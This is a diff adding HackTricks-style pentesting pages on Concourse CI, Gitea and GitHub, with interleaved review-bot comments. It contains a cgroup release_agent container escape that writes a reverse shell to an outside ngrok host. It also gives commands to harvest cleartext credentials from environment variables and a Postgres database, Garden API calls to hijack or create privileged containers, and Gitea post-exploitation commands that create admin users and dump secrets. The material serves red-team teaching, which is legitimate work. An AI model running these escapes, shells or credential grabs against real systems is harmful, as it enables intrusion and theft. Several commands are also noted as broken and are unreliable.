/tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +#==================================== +#Reverse shell +echo '#!/bin/bash' > /cmd +echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd +chmod a+x /cmd +#==================================== +# Get output +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd +#==================================== + +# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" + +# Reads the output +cat /output +``` + +#### Escaping to the node from the Web container + +Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). + +However, it stores **local credentials in clear text**: + +```bash +cat /concourse-auth/local-users +test:test + +env | grep -i local_user +CONCOURSE_MAIN_TEAM_LOCAL_USER=test +CONCOURSE_ADD_LOCAL_USER=test:test +``` + +You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. + +In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): + +```bash +env | grep -i postg +CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 +CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432 +CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432 +CONCOURSE_POSTGRES_USER=concourse +CONCOURSE_POSTGRES_DATABASE=concourse +CONCOURSE_POSTGRES_PASSWORD=concourse +[...] 
+ +# Access the postgresql db +psql -h 10.107.191.238 -U concourse -d concourse +select * from password; #Find hashed passwords +select * from access_tokens; +select * from auth_code; +select * from client; +select * from refresh_token; +select * from teams; #Change the permissions of the users in the teams +select * from users; +``` + +#### Abusing Garden Service - Not a real Attack + +{% hint style="warning" %} +This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before +{% endhint %} + +By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: + +* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. +* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. 
+ +Concourse workers run with high container privileges: + +``` +Container Runtime: docker +Has Namespaces: + pid: true + user: false +AppArmor Profile: kernel +Capabilities: + BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read +Seccomp: disabled +``` + +However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. + +{% hint style="info" %} +In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. +{% endhint %} + +Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. 
+ +**Getting inside a running privileged container** + +```bash +# Get current container +curl 127.0.0.1:7777/containers +{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} + +# Get container info +curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info +curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties + +# Execute a new process inside a container +## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 +wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ + --header='Content-Type:application/json' \ + 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' + +# OR instead of doing all of that, you could just get into the ns of the process of the privileged container +nsenter --target 76011 --mount --uts --ipc --net --pid -- sh +``` + +**Creating a new privileged container** + +You can very easily create a new container (just run a random UID) and execute something on it: + +```bash +curl -X POST http://127.0.0.1:7777/containers \ + -H 'Content-Type: application/json' \ + -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' + +# Wget will be stucked there as long as the process is being executed +wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 
20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ + --header='Content-Type:application/json' \ + 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +``` + +However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: + +``` +GET /containers HTTP/1.1. +Host: 127.0.0.1:7777. +User-Agent: Go-http-client/1.1. +Accept-Encoding: gzip. +. + +T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157 +HTTP/1.1 200 OK. +Content-Type: application/json. +Date: Thu, 17 Mar 2022 22:42:55 GMT. +Content-Length: 131. +. +{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} + +T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159 +DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1. +Host: 127.0.0.1:7777. +User-Agent: Go-http-client/1.1. +Accept-Encoding: gzip. +``` + +## References + +* https://concourse-ci.org/vars.html + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
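Review bot: In the "Creating a new privileged container" block of concourse-security/README.md the follow-up request still posts to `http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes`, i.e. the pre-existing container, not the one just created with `"handle":"123ae8fc-47ed-4eab-6b2e-123458880690"`, so nothing is ever executed in the new container; the URL should use the new handle. In both release_agent blocks the "Reverse shell" and "Get output" stanzas run back to back, so `echo '#!/bin/sh' > /cmd` silently overwrites the reverse-shell payload before the cgroup is triggered; present them as alternatives (comment one out) or write to different files. The templated path `#host_path="/mnt//hostpath-provisioner/default/concourse-work-dir--worker-/overlays//rootfs"` has lost its angle-bracket placeholders to markdown rendering and now reads as a literal path; escape the brackets or use shell-variable placeholders. The leading comment "Mounts the RDMA cgroup controller" contradicts the command, which mounts `memory`, and it is worth stating that `mount -t cgroup` and `release_agent` only exist on a cgroup v1 hierarchy: on a node booted with cgroup v2 only, the mount fails whichever controller is named and there is no `release_agent` file to abuse. The `sed` expression `\perdir=` depends on how the undefined escape `\p` is handled (presumably `upperdir=` was intended); write it out. The link to `broken-reference/README.md` for the "regular release_agent escape" is a dangling GitBook reference. Minor typos: "127..0.0.1", "agains", "This are just some", "You cloud use that credentials", "stucked".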
+{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/pentesting-ci-cd/concourse-security/concourse-lab-creation.md new file mode 100644 index 0000000000..2e65c7407d --- /dev/null +++ b/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -0,0 +1,177 @@ +# Concourse Lab Creation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Testing Environment + +### Running Concourse + +#### With Docker-Compose + +This docker-compose file simplifies the installation to do some tests with concourse: + +```bash +wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml +docker-compose up -d +``` + +You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` + +#### With Kubernetes (Recommended) + +You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). + +```bash +brew install helm +helm repo add concourse https://concourse-charts.storage.googleapis.com/ +helm install concourse-release concourse/concourse +# concourse-release will be the prefix name for the concourse elements in k8s +# After the installation you will find the indications to connect to it in the console + +# If you need to delete it +helm delete concourse-release +``` + +After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: + +```yaml +echo 'apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: read-secrets +rules: +- apiGroups: [""] + resources: ["secrets"] + verbs: ["get"] + +--- + +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: read-secrets-concourse +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: read-secrets +subjects: +- kind: ServiceAccount + name: concourse-release-web + namespace: default + +--- + +apiVersion: v1 +kind: Secret +metadata: + name: super + namespace: concourse-release-main +type: Opaque +data: + secret: MWYyZDFlMmU2N2Rm + +' | kubectl apply -f - +``` + +### Create Pipeline + +A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). 
+ +### Steps + +Several different type of steps can be used: + +* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) +* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) +* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) +* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) +* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) +* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel +* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence +* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values +* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails + +Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. + +Therefore, it's possible to indicate the type of container each step needs to be run in. 
+ +### Simple Pipeline Example + +```yaml +jobs: +- name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + sleep 1000 + echo "$SUPER_SECRET" + params: + SUPER_SECRET: ((super.secret)) +``` + +```bash +fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml +# pipelines are paused when first created +fly -t tutorial unpause-pipeline -p pipe-name +# trigger the job and watch it run to completion +fly -t tutorial trigger-job --job pipe-name/simple --watch +# From another console +fly -t tutorial intercept --job pipe-name/simple +``` + +Check **127.0.0.1:8080** to see the pipeline flow. + +### Bash script with output/input pipeline + +It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. 
+ +### Triggers + +You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: + +* Some time passes: [Time resource](https://github.com/concourse/time-resource/) +* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) +* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) +* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) + +Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
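Review bot: In the RBAC manifest under "With Kubernetes (Recommended)" in concourse-lab-creation.md, the `RoleBinding` `read-secrets-concourse` has no `namespace` in its metadata, so `kubectl apply` puts it in the current context's namespace (normally `default`) and it only lets `concourse-release-web` read secrets there, while the `Secret` `super` is created in `namespace: concourse-release-main`; add `namespace: concourse-release-main` to the RoleBinding metadata (or use a ClusterRoleBinding) so the grant covers the namespace from which `((super.secret))` is resolved. The `fly -t tutorial ...` commands in "Simple Pipeline Example" assume a target that is never created; add a `fly -t tutorial login -c http://127.0.0.1:8080` step first (for the helm deployment the web service also needs a port-forward or the URL printed by the chart). Minor: "give a access", "every-time", "Check a YAML pipeline example".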
+{% endhint %} diff --git a/pentesting-ci-cd/gitea-security/README.md b/pentesting-ci-cd/gitea-security/README.md new file mode 100644 index 0000000000..46eb21749e --- /dev/null +++ b/pentesting-ci-cd/gitea-security/README.md @@ -0,0 +1,165 @@ +# Gitea Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## What is Gitea + +**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. + +![](<../../.gitbook/assets/image (160).png>) + +### Basic Information + +{% content-ref url="basic-gitea-information.md" %} +[basic-gitea-information.md](basic-gitea-information.md) +{% endcontent-ref %} + +## Lab + +To run a Gitea instance locally you can just run a docker container: + +```bash +docker run -p 3000:3000 gitea/gitea +``` + +Connect to port 3000 to access the web page. + +You could also run it with kubernetes: + +``` +helm repo add gitea-charts https://dl.gitea.io/charts/ +helm install gitea gitea-charts/gitea +``` + +## Unauthenticated Enumeration + +* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) + +Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. + +## Internal Exploitation + +For this scenario we are going to suppose that you have obtained some access to a github account. + +### With User Credentials/Web Cookie + +If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** + +Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. 
+ +{% hint style="info" %} +Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +{% endhint %} + +### With User SSH Key + +Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). + +With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: + +```bash +# Go to the the repository folder +# Get repo config and current user name and email +git config --list +``` + +If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. + +**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. + +#### GPG Keys + +As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. + +Check locally if the current user has any key with: + +```shell +gpg --list-secret-keys --keyid-format=long +``` + +### With User Token + +For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). + +A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). 
it will has **complete access** over the user. + +### With Oauth Application + +For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application). + +An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. + +As explained in the basic information, the application will have **full access over the user account**. + +### Branch Protection Bypass + +In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: + +* **Enable Push**: If anyone with write access can push to the branch, just push to it. +* **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. +* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it +* **Require approvals is bigger than 0**: Then... you need to compromise another user +* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list +* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. + +Note that **if you are an org/repo admin** you can bypass the protections. + +### Enumerate Webhooks + +**Webhooks** are able to **send specific gitea information to some places**. 
You might be able to **exploit that communication**.\ +However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ +But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. + +Webhooks can be set at **repo and at org level**. + +## Post Exploitation + +### Inside the server + +If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` + +In this file you can find **keys** and **passwords**. + +In the gitea path (by default: /data/gitea) you can find also interesting information like: + +* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db +* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). 
+* The **jwt private key** inside the jwt folder +* More **sensitive information** could be found in this folder + +If you are inside the server you can also **use the `gitea` binary** to access/modify information: + +* `gitea dump` will dump gitea and generate a .zip file +* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) +* `gitea admin user change-password --username admin --password newpassword` Change the password +* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
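Review bot: In "Internal Exploitation" of gitea-security/README.md, "suppose that you have obtained some access to a github account" should read Gitea (copy-paste from the GitHub page), and under "With User SSH Key" the keys URL `https://github.com/\.keys` points at GitHub and has lost its placeholder; Gitea serves the same listing from the instance itself, e.g. `http://localhost:3000/<username>.keys` (escape the brackets so GitBook keeps them). The "GPG Keys" link to `broken-reference/README.md` is a dangling GitBook reference and should point at the real page or be dropped. "it will has complete access over the user" should be "it will have". The claim that a user token or OAuth application always gets full account access is version-dependent (Gitea 1.19 introduced scoped access tokens), so state the version this was tested against.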
+{% endhint %} diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md new file mode 100644 index 0000000000..b5daaad8e3 --- /dev/null +++ b/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -0,0 +1,131 @@ +# Basic Gitea Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Structure + +The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. + +Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. + +A user may also be **part of different teams** with different permissions over different repos. + +And finally **repositories may have special protection mechanisms**. + +## Permissions + +### Organizations + +When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. + +**Org admins** (owners) can select the **visibility** of the organization: + +* Public +* Limited (logged in users only) +* Private (members only) + +**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. + +When creating a new team, several important settings are selected: + +* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. +* It's also indicated **if members can create new repos** (creator will get admin access to it) +* The **permissions** the **members** of the repo will **have**: + * **Administrator** access + * **Specific** access: + +![](<../../.gitbook/assets/image (118).png>) + +### Teams & Users + +In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. 
There are **3** possible **roles**: + +* Administrator +* Write +* Read + +## Gitea Authentication + +### Web Access + +Using **username + password** and potentially (and recommended) a 2FA. + +### **SSH Keys** + +You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) + +#### **GPG Keys** + +You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. + +### **Personal Access Tokens** + +You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) + +### Oauth Applications + +Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: + +![](<../../.gitbook/assets/image (194).png>) + +### Deploy keys + +Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. + +## Branch Protections + +Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. + +The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ + +{% hint style="info" %} +It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. 
+{% endhint %} + +Different protections can be applied to a branch (like to master): + +* **Disable Push**: No-one can push to this branch +* **Enable Push**: Anyone with access can push, but not force push. +* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) +* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. +* **Enable Status checks:** Require status checks to pass before merging. +* **Require approvals**: Indicate the number of approvals required before a PR can be merged. +* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. +* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) +* **Block merge on official review requests**: If there official review requests it cannot be merged +* **Dismiss stale approvals**: When new commits, old approvals will be dismissed. +* **Require Signed Commits**: Commits must be signed. +* **Block merge if pull request is outdated** +* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes + +{% hint style="info" %} +As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
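Review bot: Under "Branch Protections" in basic-gitea-information.md the path `https://localhost:3000/\/\/settings/branches` has lost its `<owner>/<repo>` placeholders to markdown escaping and uses `https` while every other URL on the page (and the `docker run -p 3000:3000` lab) is plain `http://localhost:3000`; write it as `http://localhost:3000/<owner>/<repo>/settings/branches` with the brackets escaped. Under "Oauth Applications", "scopes aren't supported yet" is a snapshot that will go stale (Gitea 1.19 added scoped access tokens), so pin the version the screenshot refers to. Grammar: "you get discover for sending commits" should be "you may get discovered for sending commits", and "avoiding you to pushing code" should be "preventing you from pushing code".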
+{% endhint %} diff --git a/pentesting-ci-cd/github-security/README.md b/pentesting-ci-cd/github-security/README.md new file mode 100644 index 0000000000..63f6124ccb --- /dev/null +++ b/pentesting-ci-cd/github-security/README.md @@ -0,0 +1,273 @@ +# Github Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
